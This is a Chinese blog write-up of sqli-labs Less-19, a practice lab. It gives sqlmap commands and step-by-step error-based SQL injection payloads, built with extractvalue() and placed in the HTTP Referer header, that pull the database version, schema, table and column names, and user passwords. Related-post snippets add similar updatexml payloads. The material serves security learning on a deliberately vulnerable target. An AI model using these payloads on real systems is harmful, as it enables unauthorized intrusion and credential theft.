sqli-lab19关基于post的referer报错注入

最新推荐文章于 2024-04-20 11:30:00 发布
最新推荐文章于 2024-04-20 11:30:00 发布
阅读量441 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111391321
版权

知识点

referer:
http请求头里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。
就是很直观的说,访问了一个页面,你来自哪里
extractvalue()函数

extractvalue() 函数是对XML文档进行查询的函数
其实就是相当于HTML文件中用

标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
update是更新
extractvalue是查询

第十九关

sqlmap方法:
这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.txt文件中,使用SQLMAP进行注入:
Python2 sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BEST
也可以使用:

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-19/" --referer="http://127.0.0.1/sqlilabs/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch

源码分析:
和十八关差不多,只不过他将uagent变量变成了referer
然后过滤也是和十八关一样的
在这里插入图片描述查看闭合字符也和十八关一样
在这里插入图片描述在这里插入图片描述查看浏览器返回的信息是referer中的信息
一、判断注入点
(语句和方法和第十八关一样)但是在referer中进行的
不过我们这次来换个函数来做

' and extractvalue(1,concat(0x7e,(1),0x7e)))#

在这里插入图片描述二、构造payload
1.爆版本信息

' and extractvalue(1,concat(0x7e,(version()),0x7e)))#

在这里插入图片描述2.爆库

' and extractvalue(1,concat(0x7e,(database()),0x7e)))#

在这里插入图片描述
3.爆表

' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e)))#

在这里插入图片描述4.爆字段

' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)))#

在这里插入图片描述5.爆数据

' and extractvalue(1,concat(0x7e,(select username from users limit 2,1),0x7e)))#
' and extractvalue(1,concat(0x7e,(select password from users limit 2,1),0x7e)))#

在这里插入图片描述

24team
关注
专栏目录
Sqli-labs靶场第19详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 775
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
SQLi-Labs 基于报错的SQL注入
shangMD01的博客
02-17 2517
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
sqli-labs-less-19 基于http头 Referer 报错注入
yzcn
11-15 337
Less-19卡与less-18类似,只是less-18在登录正确是返回UA信息,而该卡返回Referer信息,因此做法与less-18类似,只是在抓到的包中将Referer换成我们需要进行查询的sql语句,利用错误注入,将我们需要的信息通过错误返回带出。 判断Referer闭合方式: 将Referer更改为’,返回: 可以猜测Referer传入后台数据库的语句是insert into table value(‘Referer’,‘ip’) 验证猜想,将Referer更改为1’,1)# 没有报错
sqli-labs(19
jimggg的博客
03-20 280
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
sqli-labs靶场第十九
gou1791241251的博客
12-30 1030
这一呢注入点不着账号和密码,在http头部中的referer字段。可以尝试一下输入单引号和双引号进行测试。 注意哈,前提是需要账号密码正确输入的情况下才能注入成功,因为后台会先校验账号密码是否能够查询出结果才会执行referer字段的插入操作。 由图可知啊,输入单引号时页面显示了报错信息,闭合方式为单引号闭合,此时可以使用报错注入。 ',updatexml(1,concat(0x3a,database(),0x3a),1))# 成功爆库。XPATH语法错误。 ...
SQLilabs的第19——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 427
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs(15-19
weixin_55843787的博客
04-16 3096
sqli-labs靶场过 源码分析
Sqli-labs-master超详细通教程(1-23基础篇)
m0_67391270的博客
06-12 3327
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
Sqli-lab教程-史上最全详解(1-22通
最新发布
wangluoanquan111的博客
04-20 840
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6724
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
Sqlilabs-19
KAKA的博客
07-09 362
19 跟第 18 类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs第十九详解
金 帛的博客
05-05 2455
sqli-labs第十九详解
sqli-labs(15-19)笔记
博客
04-17 2821
15 查看源码如下: 这里看护出是用post提交的参数,下面把回显报错给注释掉了,现在得知我们只能用延时注入
SQL注入 1-3_基于post报错注入
weixin_44110913的博客
12-03 563
** SQL注入 1-3_基于post报错注入 ** 一.概念 客户端提交参数基于post 1.基于post注入不会拼接到url 2.相对get提交参数更加安全 3.但是依然可以使用代理(中间人)截断判断是否存在sql注入 二.基于post报错的实列 1.打开登陆页面 按照常规的符号手段,观察以下三张图,并没有报错 当然也可以使用 id=1 and 1=2 和 id=1’ and ‘1’ =...
post 基于错误的注入 sqli-lab
m0_51822230的博客
02-17 176
get注入与post注入区别 get注入可以直接在URL上进行传输参数。 post注入是基于输入框进行注入,所以得使用辅助工具进行注入。 post注入的两个前提: 1.输入框可以交互 2.输入的语句会进入到数据库进行信息查找 下面我们用sqli-lab less11来举一个例子 less11 首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。 我们可以先对sql语句进行判断。 select uname,passwd form
sqli-labs Less-19(HTTP-Referer注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 289
通过在Referer后面加上单引号和双引号测试,猜测SQL语句大致为 insert into xxx(a,b,c) values('','','') 发现这样的payload可以时sql语句正常执行 经过尝试,发现可以使用报错注入,利用extractvalue()函数 成功爆出数据库版本号。 ...
sqli-labs(11-22)
qq_43395215的博客
08-26 141
文章目录第11:第12:第13:第14:第15:第16:第17:第18:第19:第20:第21:第22: 第11: 前面的都是于get注入的方式,接下来将是post的注入 post会以表单的形式提交后台 闭合方式: 在登录框内判断 ' or '1'='1' # 判断表的列数: -1' union all select 1,2 # sql注入: 采用第一的注入方式 使用sql函数查询系统数据 数据库版本 ' union all select 1,version()
sqli-labs19
devilare的博客
01-19 328
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sqllab第十九笔记
I_WORM的博客
03-15 415
构造payload:1' and extractvalue(1,concat(0x7e,database(),0x7e))='1。成功报错了,根据报错信息可以判断处原始语句为insert 表名()values()通过admin admin进行登录发现页面打印除了referer字段的信息。构造payload:1' and exp(710)='1。成功出现了exp()的报错信息,说明这里存在错误注入。这应该是一个referer注入。成功获取了数据库的名字;构造payload:1'
sql注入,sqli-lab
07-28
SQL注入是一种常见的网络安全漏洞,攻击者可以通过构造恶意的SQL查询语句来绕过应用程序的身份验证和授权机制,从而获取未经授权的访问权限或者执行非法操作。Sqli-lab是一个用于学习和实践SQL注入的实验环境。 在Sqli-lab中,你可以使用各种技术和工具来进行SQL注入攻击,并学习如何修复和防止这类漏洞。这个实验环境提供了一系列具有不同难度级别的注入场景,你可以尝试不同的注入技巧和方法。 重要的是,在真实环境中,开发人员应该采取一些安全措施来防止SQL注入攻击,例如使用参数化查询或者ORM框架,对用户输入进行严格的验证和过滤,限制数据库账号的权限等等。 如果你想深入学习SQL注入和防御方法,可以尝试在合法授权的环境下使用Sqli-lab进行实践。但请注意,在真实环境中进行SQL注入攻击是违法行为,严禁未经授权的测试和攻击行为。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值